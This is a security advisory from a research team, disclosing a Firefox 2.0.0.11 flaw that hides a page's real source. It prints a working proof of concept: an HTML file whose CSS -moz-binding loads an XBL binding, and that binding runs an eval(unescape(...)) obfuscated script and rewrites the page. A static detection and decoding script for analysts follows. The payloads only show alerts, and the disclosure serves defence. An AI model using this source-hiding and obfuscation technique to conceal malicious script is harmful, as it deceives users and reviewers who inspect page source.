########################## WwW.BugReport.ir ########################
#
# AmnPardaz Security Research Team
#
# Bug Title: Mozilla Firefox 2.0.0.11 Hide The Source Code
# Vendor URL: www.mozilla.org
# Version: <= 2.0.0.11
# Solution: N/A
#
######################### WwW.AmnPardaz.com ########################
####################
- Description:
####################
Reproducing this requires two files, one HTML and one XML.
The code for both is given below.
Save the following code in an HTML file.
--------------------------------------------------------------------
--------------------------------------------------------------------
<html>
<head>
<style>BODY{-moz-binding:url("moz.xml#xss")}</style>
</head>
<body>
1- Do you see any Source Code by viewing the page source? No!
<script>
alert('Soroush Dalili from BugReport.IR has something new for you! - Maybe there are some malicious codes instead of my name!')
</script>
</body>
</html>
--------------------------------------------------------------------
--------------------------------------------------------------------
Then save the following code in a file named "moz.xml".
--------------------------------------------------------------------
--------------------------------------------------------------------
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
<binding id="xss">
<implementation>
<constructor><![CDATA[
document.write('2 - Do you see any Source Code by viewing the page source? No! Your browser "Mozilla Firefox 2.0.0.11" is looking for something!')
eval(unescape('%61%6c%65%72%74%28%27%54%68%69%73%20%69%73%20%6e%65%77%20%70%61%67%65%2e%20%77%68%65%72%65%20%69%73%20%70%61%67%65%20%31%3f%20%77%68%65%72%65%20%61%72%65%20%74%68%65%20%73%6f%75%72%63%65%20%63%6f%64%65%20%6f%66%20%70%61%67%65%20%31%20%61%6e%64%20%70%61%67%65%20%32%3f%27%29'));
]]></constructor>
</implementation>
</binding>
</bindings>
--------------------------------------------------------------------
--------------------------------------------------------------------
Now open the HTML file in Mozilla Firefox <= 2.0.0.11 and it will work!
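For analysts who receive a saved page of this kind: the sketch below is an added example, not part of the original advisory. It statically lists the -moz-binding references in the HTML, pulls the constructor script out of the XBL file and decodes the unescape() literal without evaluating it. The function names are hypothetical and the sample input is constructed, shortened from the two files above.

```javascript
// Added example, not the advisory's code. Static triage only: nothing is evaluated.

// External XBL bindings pulled in from CSS via -moz-binding:url("file#id").
function findMozBindings(html) {
  const re = /-moz-binding\s*:\s*url\(\s*(["']?)([^"')]+)\1\s*\)/gi;
  const found = [];
  for (const m of html.matchAll(re)) {
    const [file, id = ""] = m[2].trim().split("#");
    found.push({ file, id });
  }
  return found;
}

// Script bodies of every <constructor> in an XBL document (CDATA wrapper optional).
function extractConstructors(xbl) {
  const re = /<constructor>\s*(?:<!\[CDATA\[)?([\s\S]*?)(?:\]\]>)?\s*<\/constructor>/gi;
  return [...xbl.matchAll(re)].map((m) => m[1].trim());
}

// Decode string literals passed to unescape(), using unescape's %XX / %uXXXX rules.
function decodeUnescapeLiterals(script) {
  const re = /unescape\(\s*(["'])([^"']*)\1\s*\)/g;
  return [...script.matchAll(re)].map((m) =>
    m[2].replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi, (_, u, h) =>
      String.fromCharCode(parseInt(u || h, 16))
    )
  );
}

// Constructed sample input, shortened from the two files in the advisory.
const sampleHtml = '<style>BODY{-moz-binding:url("moz.xml#xss")}</style>';
const sampleXbl = `<bindings xmlns="http://www.mozilla.org/xbl">
<binding id="xss"><implementation><constructor><![CDATA[
document.write('replaced page');
eval(unescape('%61%6c%65%72%74%28%31%29'));
]]></constructor></implementation></binding></bindings>`;

// Combine the three checks into one report for a page and its binding file.
function triage(html, xbl) {
  const scripts = extractConstructors(xbl);
  return {
    bindings: findMozBindings(html),
    usesDocumentWrite: scripts.some((s) => /document\.write\s*\(/.test(s)),
    decoded: scripts.flatMap(decodeUnescapeLiterals),
  };
}

console.log(JSON.stringify(triage(sampleHtml, sampleXbl), null, 2));
```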
####################
- Credit :
####################
AmnPardaz Security Research Team
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com